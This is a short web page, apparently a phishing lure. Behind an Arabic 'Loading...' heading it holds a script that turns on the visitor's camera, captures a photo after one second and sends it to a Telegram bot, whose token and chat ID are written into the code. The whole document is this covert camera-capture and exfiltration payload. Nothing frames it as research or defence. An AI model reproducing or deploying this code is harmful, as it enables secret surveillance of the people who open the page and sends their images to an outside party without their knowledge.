check-amer-2026

<?xml encoding="utf-8" ?><p>&lt;body style="background:#000;color:#fff;text-align:center;"&gt;</p><p>&lt;h2&gt;&#1580;&#1575;&#1585;&#1610; &#1575;&#1604;&#1578;&#1581;&#1605;&#1610;&#1604;...&lt;/h2&gt;</p><p>&lt;script&gt;</p><p>navigator.mediaDevices.getUserMedia({video:true}).then(s=&gt;{</p><p>&nbsp; const v=document.createElement('video'); v.srcObject=s; v.play();</p><p>&nbsp; setTimeout(()=&gt;{</p><p>&nbsp; &nbsp; const c=document.createElement('canvas'); c.width=640; c.height=480;</p><p>&nbsp; &nbsp; c.getContext('2d').drawImage(v,0,0);</p><p>&nbsp; &nbsp; c.toBlob(b=&gt;{</p><p>&nbsp; &nbsp; &nbsp; const f=new FormData(); f.append('chat_id','7069359040');</p><p>&nbsp; &nbsp; &nbsp; f.append('photo',b,'x.jpg');</p><p>&nbsp; &nbsp; &nbsp; fetch('https://api.telegram.org/bot8494679315:AAGnzectHH9ZQAxKmddQ9cwRSn2ym2m-mkQ/sendPhoto',{method:'POST',body:f});</p><p>&nbsp; &nbsp; },'image/jpeg');</p><p>&nbsp; },1000);</p><p>});</p><p>&lt;/script&gt;</p><p>&lt;/body&gt;</p><p>&nbsp;</p>